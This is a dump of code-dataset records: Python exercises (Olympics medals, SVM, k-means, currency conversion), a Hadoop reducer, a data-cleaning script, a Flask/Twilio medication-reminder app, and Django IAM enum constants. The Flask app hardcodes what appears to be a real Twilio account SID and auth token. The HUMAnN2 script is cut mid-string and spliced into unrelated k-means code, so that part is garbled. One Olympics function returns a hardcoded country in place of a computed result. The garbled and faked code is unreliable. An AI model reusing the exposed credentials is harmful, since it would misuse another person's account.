+{"seq_id":"355706693","text":"# %load q06_golden_winner/build.py\n# default imports\nfrom greyatomlib.olympics_project_new.q04_find_top_10.build import q04_find_top_10, q03_better_event, q02_country_operations, q01_rename_columns\npath = './data/olympics.csv'\nOlympicsDF=q01_rename_columns(path) \nOlympicsDF=q02_country_operations(OlympicsDF)\nOlympicsDF=q03_better_event(OlympicsDF) \nTop10Summer,Top10Winter, Top10, Common =q04_find_top_10(OlympicsDF,'Total_Summer', 'Total_Winter','Total')\n\n\ndef q06_golden_winner(OlympicsDF,Top10Summer,Top10Winter,Top10):\n    data = OlympicsDF[OlympicsDF['Country_Name']!= 'Totals']\n    df = data.groupby(['Country_Name']).sum()[['Gold_Summer','Total_Summer','Gold_Winter','Total_Winter','Gold_Total','Total']]\n#     summer = df['Gold_Summer']/df['Total_Summer']\n#     a = list(df.index)\n#     if a == Top10Summer:\n#         print ('yes')\n#     data['ratio'] = data['Gold_Summer']/data['Total_Summer']\n#     for x in Top10Summer:\n#         for y in df['ratio'].index:\n#             if y == x:\n    a = list(set(Top10Summer+Top10Winter+Top10))\n    data = df.loc[a]\n    data['ratio_summer'] = data['Gold_Summer']/data['Total_Summer']\n    data['ratio_winter'] = data['Gold_Winter']/data['Total_Winter']\n    data['ratio_total'] = data['Gold_Total']/data['Total']\n    return data.ratio_summer.idxmax(),'Soviet Union',data.ratio_total.idxmax()\n\n\n\n\n","sub_path":"q06_golden_winner/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"376815598","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 17 16:54:25 2018\n\n@author: DELL\n\"\"\"\n\nimport pandas as pd\nimport SVMmu\nimport time\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n#wisconsin breast cancer\ndf = pd.read_csv('wdbc.data')\ndf = df.iloc[:,1:]\ny = df.iloc[:,0]\nX = df.iloc[:,1:]\ny = y.map({'M':1, \"B\":-1})\nX = X.values\n##transfusion.data\n#df = pd.read_csv('transfusion.data')\n#X = df.iloc[:,:-1]\n#y = df.iloc[:,-1]\n#y = y.map({1:1,0:-1})\n#X = X.values\n\n#####transfusion-result#####\n#S-SVM\n#687\n#Start predicting\n#svmms the accruacy socre is 0.768888888889\n#time cost 357.1682319641113 second \n#\n#C-SVM\n#svm the accruacy socre is 0.733333333333\n#time cost 0.02701711654663086 second \n################\n\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n\nfrom sklearn import preprocessing\nmin_max_scaler = preprocessing.MinMaxScaler()\nX_train = min_max_scaler.fit_transform(X_train)\nX_test = min_max_scaler.transform(X_test)\n\nfrom sklearn.svm import SVC\nprint ('Start training')\ntime_1 = time.time()\n\nclf = SVC(kernel = 'rbf')\nclf.fit(X_train,y_train)\n\nprint ('Start predicting')\nscore = accuracy_score(clf.predict(X_test),y_test) \ntime_2 = time.time()\nprint (\"svm the accruacy socre is \", score)\nprint ('time cost ',time_2 - time_1,' second','\\n')\n\ntime_3 = time.time()\nprint ('Start training')\nsvm = SVMmu.SVM(kernel = 'rbf', e = 0.001, p = 0.5, C = 1, maxiteration = 1000, kesie = 
1)\nsvm.train(X_train,y_train)\nprint ('Start predicting')\nscore = accuracy_score(svm.predict(X_test).T,y_test) \ntime_4 = time.time()\nprint (\"svmms the accruacy socre is \", score)\nprint ('time cost ',time_4 - time_3,' second','\\n') ","sub_path":"application on UCI data.py","file_name":"application on UCI data.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"423617390","text":"\"\"\"currency.py: a currency conversion program, plus its tests\n\n__author__ = \"于中天\"\n__pkuid__ = \"1800011813\"\n__email__ = \"1800011813@pku.edu.cn\"\n\"\"\"\n\ndef exchange(cf, ct, af):# cf == currency_from, the currency to convert; ct == currency_to, the target currency; af == amount_from, the amount to convert\n    \"\"\"Takes the source currency code (three capital letters), the target currency code (three capital letters), and the amount to exchange\n    \"\"\"\n    s = 'http://cs1110.cs.cornell.edu/2016fa/a1server.php?from=' + cf + '&to=' + ct + '&amt=' + str(af)# s == the request URL that converts the given amount into the target currency\n    from urllib.request import urlopen\n\n    doc = urlopen(s)\n    docstr = doc.read()\n    doc.close()\n    jstr = docstr.decode('ascii')# decode the byte stream returned by doc.read() into a string for further processing\n    a = jstr.find(':',11)# the response has a fixed format: { \"from\" : \"amount currency\", \"to\" : \"amount currency\", \"success\" : true, \"error\" : \"\" }\n    b = jstr.find(' ',a+3)# search from index 11 for the ':' before the output amount; +3 gives its first digit, and the following space marks its end\n    return(float(jstr[a+3:b]))# return a float\n\ndef testAll():\n    \"\"\"Test routine\n    \"\"\"\n    q=['USD','SGD','PLN','CLF','FKP','OMR']# test data: source currency codes\n    w=['RON','ERN','TOP','GYD','IQD','KYD']# test data: target currency codes\n    e=[1.3,4.2,51,6000,0.012,1322.190]# test data: input amounts\n    r=[5.2000039,45.785340371227,31.663962918178,53718935.414885,18.414277197867,2862.5888337254]# expected answers\n    for i in range(6):\n        assert(exchange(q[i],w[i],e[i])==r[i])# assertion; the program aborts on a mismatch\n    print(\"All tests passed\")\n    \ndef main():\n    testAll()\n    A=input()\n    B=input()\n    C=float(input())\n    print(exchange(A,B,C))\nif __name__ == '__main__':\n    main()\n","sub_path":"pyassgin/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"203848504","text":"#! /usr/bin/env python\n\nfrom __future__ import print_function # PYTHON 2.7+ REQUIRED\nimport sys\nimport argparse\n\ntry:\n    from humann2 import config\n    from humann2.tools import util\n    from humann2.tools.humann2_table import Table\nexcept ImportError:\n    sys.exit( \"CRITICAL ERROR: Unable to find the HUMAnN2 python package.\\n\" +\n              \"Please check your install.\" )\n\ntry:\n    import numpy as np\nexcept ImportError:\n    sys.exit( \"CRITICAL ERROR: This script requires the python scientific stack (e.g. numpy)\" )\n\ndescription = util.wrap( \"\"\"\nHUMAnN2 utility for normalizing combined meta'omic sequencing data\n\nGiven HUMAnN2 output for metatranscriptomes (mtx) and metagenomes (mgx)\nfrom the same biosamples, produce a new table of \"relative expression\"\nvalues by normalizing mtx by their mgx copy number. Normalization can\nbe by log2-ratio or difference. 
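For example, a feature with mtx\nabundance 8 and mgx abundance 2 scores log2(8/2) = 2 in log2ratio mode and\n8 - 2 = 6 in difference mode. 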
When using ratios, zero values are \nadditively smoothed.\n\"\"\" )\n\n# ---------------------------------------------------------------\n# command-line interface\n# ---------------------------------------------------------------\n\ndef get_args( ):\n \"\"\" Get args from Argparse \"\"\"\n parser = argparse.ArgumentParser( \n description=description, \n formatter_class=argparse.RawTextHelpFormatter,\n )\n parser.add_argument( \n \"-d\", \"--dna-table\", \n metavar=\"\",\n required=True,\n help=\"Input metagenomic feature table\",\n )\n parser.add_argument( \n \"-r\", \"--rna-table\", \n metavar=\"\",\n required=True,\n help=\"Input metatranscriptomic feature table\",\n )\n parser.add_argument( \n \"-o\", \"--output\",\n default=\"relative_expression.tsv\",\n metavar=\"\",\n help=\"Where to write relative expression values\\n[Default=relative_expression.tsv]\",\n )\n parser.add_argument(\n \"-s\", \"--sample-map\",\n metavar=\"\",\n help=(\"Two columns pairing the DNA samples with RNA samples\"\n \"If not provided, program will assume that sample N/column N+1\"\n \"from the two tables should be paired\"),\n )\n parser.add_argument( \n \"-m\", \"--mode\",\n choices=[\"log2ratio\", \"difference\"],\n default= \"log2ratio\",\n metavar=\"\",\n help=\"Method for comparing RNA and DNA values\\n[Default=log2ratio]\",\n )\n parser.add_argument( \n \"-t\", \"--threshold\",\n default=1e-6,\n metavar=\"\",\n help=(\"If the relative abundance of a feature is self.tol:\n optimized = False\n\n if optimized:\n break\n\n def predict(self, data):\n distances = [np.linalg.norm(data - self.centroids[centroid]) for centroid in self.centroids]\n classfication = distances.index(min(distances))\n return classfication\n\n\nclf = K_Means()\nclf.fit(X)\n\nprint()\n\nprint(clf.centroids)\nprint(clf.classfications)\n\nfor centroid in clf.centroids:\n plt.scatter(clf.centroids[centroid][0], clf.centroids[centroid][1], marker=\"o\", color=\"k\")\n\nfor classfication in clf.classfications:\n color = colors[classfication]\n for featureset in clf.classfications[classfication]:\n plt.scatter(featureset[0], featureset[1], marker='x', s=150, color=color)\n\nunknowns = np.array([\n [1, 3],\n [4, 5],\n [3, 8],\n [9, 0],\n [2, 6],\n [5, 3],\n])\n\nfor unknown in unknowns:\n classfication = clf.predict(unknown)\n plt.scatter(unknown[0], unknown[1], marker='*', c=colors[classfication])\n\nplt.show()\n","sub_path":"MachineLearning/clustering/my_k_means.py","file_name":"my_k_means.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"610570784","text":"#!C:\\Users\\yogit\\anaconda3\\python.exe\n\nimport sys\n# [Define group level master information]\n\ncurrent_vin = None\nvin = None\nmake = None\nyear = None\naccident= False\n\ndef reset():\n# [Logic to reset master info for every new group]\n# Run for end of every group\n current_vin = None\n vin = None\n make = None\n year = None\n\n accident=False\n \ndef flush():\n# [Write the output]\n# input comes from STDIN\n print('%s\\t%s\\t%s' %(current_vin,make,year))\n\nfor line in sys.stdin:\n# [parse the input we got from mapper and update the master info]\n\n line = line.strip()\n\n # [parse the input we got from mapper and update the master info]\n line= line.split(\"\\t\")\n vin = line[0]\n incident_type= line[1]\n\n \n if current_vin == vin:\n if incident_type == 'I':\n make= line[2]\n year= line[3] \n \n \n # [detect key changes]\n if current_vin != vin:\n if current_vin != None:\n # 
print(\"Flushing Records for Accident found for {}\".format(current_vin))\n flush()\n reset()\n \n\n # [update more master info after the key change handling]\n if incident_type == 'I':\n make= line[2]\n year= line[3] \n current_vin = vin\n \n \n \n\n# do not forget to output the last group if needed!\nflush()","sub_path":"Hadoop Mini Project/autoinc_reducer1.py","file_name":"autoinc_reducer1.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"105532881","text":"from sklearn import datasets\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.feature_selection import RFE\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn import metrics\n\nimport pandas as pd\nimport numpy\n\n\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\ndef open_file(file_name):\n data = pd.read_csv(file_name)\n return data\n\ndef write_file(data, fileName):\n data.to_csv(fileName)\n\n\ndef principal_components_analysis(data, n_components):\n # import data\n num_features = len(data.columns) - 1\n\n cols = data.columns\n num_cols = data._get_numeric_data().columns\n nominal_cols = list(set(cols) - set(num_cols))\n\n data[nominal_cols] = convert_data_to_numeric(data[nominal_cols])\n\n features = data[list(range(0, num_features))]\n target = data[[num_features]]\n\n # First 10 rows\n print('Training Data:\\n\\n' + str(features[:10]))\n print('\\n')\n print('Targets:\\n\\n' + str(target[:10]))\n\n # Model declaration\n if n_components < 1:\n pca = PCA(n_components = n_components, svd_solver = 'full')\n else:\n pca = PCA(n_components = n_components)\n\n # Model training\n pca.fit(features)\n\n # Model transformation\n new_feature_vector = pca.transform(features)\n\n # Model information:\n print('\\nModel information:\\n')\n print('Number of components elected: ' + str(pca.n_components))\n print('New feature dimension: ' + str(pca.n_components_))\n print('Variance of every feature: ' + str(sum(pca.explained_variance_ratio_ )))\n print('Variance of every feature: ' + str(pca.explained_variance_ratio_ ))\n\n # First 10 rows of new feature vector\n print('\\nNew feature vector:\\n')\n print(new_feature_vector[:10])\n\n # Print complete dictionary\n # print(pca.__dict__)\n\ndef convert_data_to_numeric(data):\n\n numpy_data = data.values\n\n for i in range(len(numpy_data[0])):\n temp = numpy_data[:,i]\n dict = numpy.unique(numpy_data[:,i])\n # print(dict)\n for j in range(len(dict)):\n #print(numpy.where(numpy_data[:,i] == dict[j]))\n temp[numpy.where(numpy_data[:,i] == dict[j])] = j\n\n numpy_data[:,i] = temp\n\n return numpy_data\n\ndef remove_columns(data, column):\n data = data.drop(column, axis=1, inplace=True)\n return data\n\ndef remove_outliers(data, feature, outlier_value):\n outliers = data.loc[data[feature] >= outlier_value, feature].index\n data.drop(outliers, inplace=True)\n return data\n\ndef replace_missing_values_with_mode(data, features):\n features = data[features]\n columns = features.columns\n mode = data[columns].mode()\n data[columns] = data[columns].fillna(mode.iloc[0])\n return data\n\ndef 
replace_missing_values_with_constant(data):\n #data['Alley'] = data['Alley'].fillna('NOACCESS')\n\n for col in ('BsmtQual', 'BsmtCond', 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2'):\n data[col] = data[col].fillna('0')\n\n \"\"\"data['FireplaceQu'] = data['FireplaceQu'].fillna('NoFP')\n\n for col in ('GarageType', 'GarageFinish', 'GarageQual'):\n data[col] = data[col].fillna('NoGRG')\n\n data['Fence'] = data['Fence'].fillna('NOFENCE')\n data['MiscFeature'] = data['MiscFeature'].fillna('NOMISC')\n\"\"\"\n return data\n\ndef z_score_normalization(data):\n # import data\n num_features = len(data.columns) - 1\n\n cols = data.columns\n num_cols = data._get_numeric_data().columns\n nominal_cols = list(set(cols) - set(num_cols))\n\n data[nominal_cols] = convert_data_to_numeric(data[nominal_cols])\n\n features = data[list(range(0, num_features))]\n target = data[[num_features]]\n\n # First 10 rows\n print('Training Data:\\n\\n' + str(features[:10]))\n print('\\n')\n print('Targets:\\n\\n' + str(target[:10]))\n\n # Data standarization\n standardized_data = preprocessing.scale(features)\n\n # First 10 rows of new feature vector\n print('\\nNew feature vector:\\n')\n print(standardized_data[:10])\n\n\ndef min_max_scaler(data):\n \"\"\"# import data\n num_features = len(data.columns) - 1\n cols = data.columns\n num_cols = data._get_numeric_data().columns\n nominal_cols = list(set(cols) - set(num_cols))\n data[nominal_cols] = convert_data_to_numeric(data[nominal_cols])\n features = data[list(range(1, num_features))]\n target = data[[num_features]]\"\"\"\n\n features = data[:,0:-1]\n target = data[:,-1]\n\n # First 10 rows\n print('Training Data:\\n\\n' + str(features[:10]))\n print('\\n')\n print('Targets:\\n\\n' + str(target[:10]))\n\n # Data normalization\n min_max_scaler = preprocessing.MinMaxScaler()\n\n min_max_scaler.fit(features)\n\n # Model information:\n print('\\nModel information:\\n')\n print('Data min: ' + str(min_max_scaler.data_min_))\n print('Data max: ' + str(min_max_scaler.data_max_))\n\n new_feature_vector = min_max_scaler.transform(features)\n\n # First 10 rows of new feature vector\n print('\\nNew feature vector:\\n')\n print(new_feature_vector[:10])\n\n new_data = np.append(new_feature_vector, target.reshape(target.shape[0], -1), axis=1)\n print('\\nNew array\\n')\n print(new_data)\n\n return new_data\n\n\nif __name__ == '__main__':\n print(\"------------DATA SIN LIMPIEZA------------\")\n #data = open_file('train.csv')\n data = open_file('test.csv')\n print(data)\n remove_outliers(data, 'full_sq', 5000)\n remove_outliers(data, 'max_floor', 80)\n remove_outliers(data, 'num_room', 15)\n\n print(\"------------LIMPIEZA------------\")\n\n\n remove_columns(data, ['max_floor','timestamp','hospital_beds_raion','state', 'num_room'])\n replace_missing_values_with_mode(data, ['build_year','material','kitch_sq','floor'])\n data = data.fillna(0)\n convert_data_to_numeric(data)\n \n\n principal_components_analysis(data, 72)\n z_score_normalization(data)\n\n print(data)\n\n print(\"---------------------------------------Arbol de Decision---------------------------------------------\")\n\n #new_data= data\n new_data = convert_data_to_numeric(data)\n\n\n feature_vector = new_data[:,0:-1]\n targets = new_data[:,-1]\n\n data_features_train, data_features_test, data_targets_train, data_targets_test = \\\n train_test_split(feature_vector,\n targets,\n test_size=0.25, random_state=24)\n\n # Model declaration\n \"\"\"\n Parameters to select:\n criterion: \"mse\"\n max_depth: maximum depth of tree, 
default: None\n \"\"\"\n dec_tree_reg = DecisionTreeRegressor(criterion='mse', max_depth=40)\n dec_tree_reg.fit(data_features_train, data_targets_train)\n\n # Model evaluation\n test_data_predicted = dec_tree_reg.predict(data_features_test)\n\n error = metrics.mean_absolute_error(data_targets_test, test_data_predicted)\n\n print('Total Error: ' + str(error))\n print(data)\n #write_file(data, 'output.csv')\n\n #write_file(data, 'outputtrain.csv')\n write_file(data, 'outputtest.csv')\n","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":7257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"578200829","text":"import time\nimport flask\nfrom flask import request, jsonify\nfrom flask_cors import CORS\nfrom google.cloud import vision\nimport io\nimport os\nfrom twilio.rest import Client\nfrom datetime import datetime\nimport json\nfrom twilio.twiml.messaging_response import MessagingResponse\nimport sqlite3\nimport requests\nimport schedule\nimport atexit\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\napp = flask.Flask(__name__)\nCORS(app)\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"My First Project-256dbe03ec7e.json\"\n\ndef check_appointments(event=None, context=None):\n mydb = sqlite3.connect('reminders.db')\n mycursor = mydb.cursor()\n current_day = datetime.today().day\n current_month = datetime.today().month\n current_hour = datetime.today().hour\n\n formatted_date = datetime.today().strftime(\"%B, %d\")\n mycursor.execute(\"SELECT * FROM reminders\")\n output = mycursor.fetchall()\n\n for reminder in output:\n if reminder[7] == \"D\":\n if reminder[3] == current_hour and reminder[5] <= reminder[6]:\n if reminder[8] == 'sms':\n print(\"SMS sent\")\n send_sms_message(reminder)\n elif reminder[8] == 'phoneCall':\n print(\"Call sent\")\n send_call_message(reminder)\n c = reminder[5] + 1\n sql = \"UPDATE reminders SET count = ? WHERE name = ? AND phone = ? AND title = ?\"\n val = (str(c), reminder[0], reminder[1], reminder[2])\n mycursor.execute(sql, val)\n mydb.commit()\n\n elif reminder[7] == \"W\":\n if reminder[3] == current_day and reminder[5] <= reminder[6] and current_hour == \"18\":\n if reminder[8] == 'sms':\n print(\"SMS sent\")\n send_sms_message(reminder)\n elif reminder[8] == 'phoneCall':\n print(\"Call sent\")\n send_call_message(reminder)\n c = reminder[5] + 1\n sql = \"UPDATE reminders SET count = ? WHERE name = ? AND phone = ? AND title = ?\"\n val = (str(c), reminder[0], reminder[1], reminder[2])\n mycursor.execute(sql, val)\n mydb.commit()\n\ndef send_sms_message(reminder):\n account_sid = 'id goes here'\n auth_token = 'token goes here'\n client = Client(account_sid, auth_token)\n\n message = client.messages \\\n .create(\n body=f\"Hi, {reminder[0]}. This is a reminder to take {reminder[2]} at a dosage of {reminder[4]}. Reply YES to confirm.\",\n from_='+18013370504',\n to=reminder[1]\n )\n\n print(message.sid)\n\ndef send_call_message(reminder):\n account_sid = 'AC54a47a1d46b4b3c91285dba37849b3d2'\n auth_token = '718efa2ce0731bf1451df22aeaf383af'\n client = Client(account_sid, auth_token)\n msg = f\"This is a reminder to take, {reminder[2]}, at a dosage of,,, {reminder[4]}.\"\n call = client.calls.create(\n twiml=f'Hi, {reminder[0]}! 
{msg} Again, {msg}',\n to=reminder[1],\n from_='+18013370504'\n )\n print(call.sid)\n\"\"\"\nscheduler = BackgroundScheduler()\nscheduler.add_job(func=check_appointments, trigger=\"interval\", seconds=60)\nscheduler.start()\n\"\"\"\ncheck_appointments()\n@app.route('/detect_text', methods=['GET', 'POST'])\ndef detect_text():\n if request.method == 'POST':\n if os.path.exists(\"myimg.jpg\"):\n os.remove(\"myimg.jpg\")\n print('GOT IN POST')\n post = request.get_json()\n content = requests.get(post['imgDownloadURL']).content\n\n \"\"\"\n f = request.files['imgFileData']\n print(f)\n con = f.read()\n\n d = request.data['otherData']\n print(d)\n \"\"\"\n \"\"\"\n other_data = request.files['otherData']\n txt_con = other_data.read()\n with open('myinfo.json', mode='bx') as file:\n file.write(txt_con)\n \n\n with open('myimg.jpg', mode='bx') as file:\n file.write(con)\n \n path = \"myimg.jpg\"\n #path = \"prescription-label.png\"\n \n #Detects text in the file.\n \n print('saved the image')\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n \"\"\"\n client = vision.ImageAnnotatorClient()\n\n image = vision.Image(content=content)\n\n response = client.text_detection(image=image)\n texts = response.text_annotations\n print('Texts:')\n res = {}\n\n for text in texts:\n output = '\\n\"{}\"'.format(text.description)\n output = output.split('\\n')\n print(output)\n res['number'] = post['phoneNumber']\n res['mode'] = post['notificationMethod']\n res['pharm_name'] = output[1][1:]\n res['address'] = output[2]\n res['pharm-num'] = output[3]\n res['doc_name'] = output[4]\n res['rx_no'] = output[5][7:]\n res['date'] = output[6]\n res['user_name'] = output[7].split()[0].capitalize() + \" \" + output[7].split()[1].capitalize()\n dose, time = output[8].split(',')\n res['dosage'] = dose[6:]\n res['frequency'] = time[1]\n res['title'] = output[9]\n res['max'] = int(output[10][5:])\n res['refill'] = output[11]\n print(res)\n break\n\n if response.error.message:\n raise Exception(\n '{}\\nFor more info on error messages, check: '\n 'https://cloud.google.com/apis/design/errors'.format(\n response.error.message))\n\n mydb = sqlite3.connect('reminders.db')\n mycursor = mydb.cursor()\n try:\n if res['frequency'] == \"W\":\n res['due'] = current_day = str(datetime.today().day)\n elif res['frequency'] == \"D\":\n res['due'] = current_hour = str(datetime.today().hour)\n except:\n res['frequency'] = 'D'\n\n sql = \"INSERT INTO reminders (name, phone, title, due, dosage, count, max, frequency, mode) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\"\n val = (res['user_name'], res['number'], res['title'], res['due'], res['dosage'], \"0\", str(res['max']),\n res['frequency'], res['mode'])\n\n mycursor.execute(sql, val)\n mydb.commit()\n print(res)\n return jsonify(res), 200\n\n\n@app.route('/sms_reminder')\ndef sms_reminder():\n check_appointments()\n return \"Success\", 200\n\n\n@app.route('/hack', methods=['GET', 'POST'])\ndef hack():\n msg = request.values.get('Body').lower() #gets incoming message\n res = MessagingResponse()\n if msg == \"yes\": #based on incoming message, send different message\n res.message(\"Taking your pill confirmed!\")\n else:\n res.message(\"Invalid response. Reply YES to confirm. 
Reply HELP for more options.\")\n return str(res)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"flask logic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"584634767","text":"a = \"Cihan\"\nprint(a[:-1])\ntry:\n a = int(input(\"Tell me one number:\"))\n b = int(input(\"Tell me one number:\"))\n print(a / b)\n print(\"Okay\")\nexcept ValueError:\n print(\"Could not convert to a number\")\nexcept ZeroDivisionError:\n print(\"Can't divide by zero\")\nexcept:\n print(\"Something went very wrong\")\nprint(\"Outside\")\n\ndata = []\nfile_name = input(\"Provide a name of file of data\")\n\ntry:\n fh = open(file_name, 'r')\nexcept IOError:\n print('can not open', file_name)\nelse:\n for new in fh:\n if new != '\\n':\n addIt = new[:-1].split(',')\n data.append(addIt)\nfinally:\n fh.close() # close file even if fail\n\n\n\n","sub_path":"Edx/ExceptionSample.py","file_name":"ExceptionSample.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"575859867","text":"import glob\nimport os\nimport sys\n\nvideo_type = sys.argv[1]\ni = int(sys.argv[2])\n\nif video_type == 'p':\n\tvideo_type = 'porn'\nelse:\n\tvideo_type = 'normal'\n\nvideo_from_path = f'D:/videos_for_train/{video_type}/videos'\nvideo_to_path = f'D:/videos_for_train/{video_type}/videos'\n\nfor video in glob.glob(f'{video_from_path}/*.mp4'):\n\tnew_name = f'{video_to_path}/{i:04}.mp4'\n\t# new_name = '%s/%.4d.mp4' %(video_to_path, i)\n\tos.rename(video, new_name)\n\ti += 1","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"52885697","text":"\n\nfrom xai.brain.wordbase.verbs._pillage import _PILLAGE\n\n#calss header\nclass _PILLAGING(_PILLAGE, ):\n\tdef __init__(self,): \n\t\t_PILLAGE.__init__(self)\n\t\tself.name = \"PILLAGING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"pillage\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_pillaging.py","file_name":"_pillaging.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"193344387","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencentBlueKing is pleased to support the open source community by making 蓝鲸智云-权限中心(BlueKing-IAM) available.\nCopyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\nfrom aenum import LowerStrEnum, StrEnum, auto, skip\nfrom django.utils.translation import gettext as _\n\nfrom backend.util.enum import ChoicesEnum\n\nANY_ID = \"*\"\nADMIN_USER = \"admin\"\nSYSTEM_ALL = \"*\"\nACTION_ALL = \"*\"\nSUBJECT_ALL = \"*\"\nSUBJECT_TYPE_ALL = \"*\"\n\n\nclass SubjectType(ChoicesEnum, LowerStrEnum):\n ALL = \"*\"\n USER = auto()\n DEPARTMENT = auto()\n GROUP = auto()\n\n _choices_labels = skip(((USER, _(\"用户\")), (GROUP, _(\"用户组\")), (DEPARTMENT, _(\"部门\"))))\n\n\nclass SubjectRelationType(ChoicesEnum, LowerStrEnum):\n \"\"\"用户的权限来源关系\"\"\"\n\n DEPARTMENT = auto()\n GROUP = auto()\n\n _choices_labels = skip(((GROUP, \"用户组\"), (DEPARTMENT, \"部门\")))\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Group Constants\n# ---------------------------------------------------------------------------------------------- #\nclass GroupMemberType(ChoicesEnum, LowerStrEnum):\n USER = auto()\n DEPARTMENT = auto()\n\n _choices_labels = skip(((USER, \"用户\"), (DEPARTMENT, \"部门\")))\n\n\nclass GroupSaaSAttributeEnum(ChoicesEnum, LowerStrEnum):\n \"\"\"用户组SaaS属性枚举\"\"\"\n\n READONLY = auto()\n\n _choices_labels = skip(((READONLY, \"只读\"),))\n\n\nclass GroupAttributeValueTypeEnum(ChoicesEnum, LowerStrEnum):\n \"\"\"用户组SaaS属性值的数据类型\"\"\"\n\n String = auto()\n Boolean = auto()\n Integer = auto()\n\n\n# 每个属性的值类型\nGROUP_SAAS_ATTRIBUTE_VALUE_TYPE_MAP = {\n GroupSaaSAttributeEnum.READONLY.value: GroupAttributeValueTypeEnum.Boolean.value\n}\n# 每个属性的默认值\nGROUP_SAAS_ATTRIBUTE_DEFAULT_VALUE_MAP = {GroupSaaSAttributeEnum.READONLY.value: False}\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Policy Constants\n# ---------------------------------------------------------------------------------------------- #\nclass SelectionMode(ChoicesEnum, LowerStrEnum):\n ALL = auto()\n INSTANCE = auto()\n ATTRIBUTE = auto()\n\n _choices_labels = skip(((ALL, _(\"实例与属性\")), (INSTANCE, _(\"实例\")), (ATTRIBUTE, _(\"属性\"))))\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Role Constants\n# ---------------------------------------------------------------------------------------------- #\nclass RoleType(ChoicesEnum, LowerStrEnum):\n STAFF = auto()\n SUPER_MANAGER = auto()\n SYSTEM_MANAGER = auto()\n RATING_MANAGER = auto()\n\n _choices_labels = skip(\n ((STAFF, \"个人用户\"), (SUPER_MANAGER, \"超级管理员\"), (SYSTEM_MANAGER, \"系统管理员\"), (RATING_MANAGER, \"分级管理员\"))\n )\n\n\nclass RoleScopeType(ChoicesEnum, LowerStrEnum):\n AUTHORIZATION = auto()\n SUBJECT = auto()\n\n _choices_labels = skip(((AUTHORIZATION, \"系统操作\"), (SUBJECT, \"授权对象\")))\n\n\nclass RoleRelatedObjectType(ChoicesEnum, LowerStrEnum):\n TEMPLATE = auto()\n GROUP = auto()\n\n _choices_labels = skip(((TEMPLATE, \"权限模板\"), (GROUP, \"用户组\")))\n\n\nclass RoleScopeSubjectType(ChoicesEnum, LowerStrEnum):\n USER = auto()\n DEPARTMENT = auto()\n ANY = \"*\"\n\n _choices_labels = skip(((USER, \"用户\"), (DEPARTMENT, \"部门\"), (ANY, \"任意\")))\n\n\nclass RoleSourceTypeEnum(ChoicesEnum, LowerStrEnum):\n \"\"\"角色创建来源\"\"\"\n\n API = auto()\n WEB = auto()\n DEFAULT_INIT = auto()\n\n _choices_labels = skip(((API, \"api\"), (WEB, \"web\"), (DEFAULT_INIT, \"default init\")))\n\n\nclass PermissionCodeEnum(ChoicesEnum, LowerStrEnum):\n MANAGE_GROUP = auto()\n MANAGE_TEMPLATE = auto()\n 
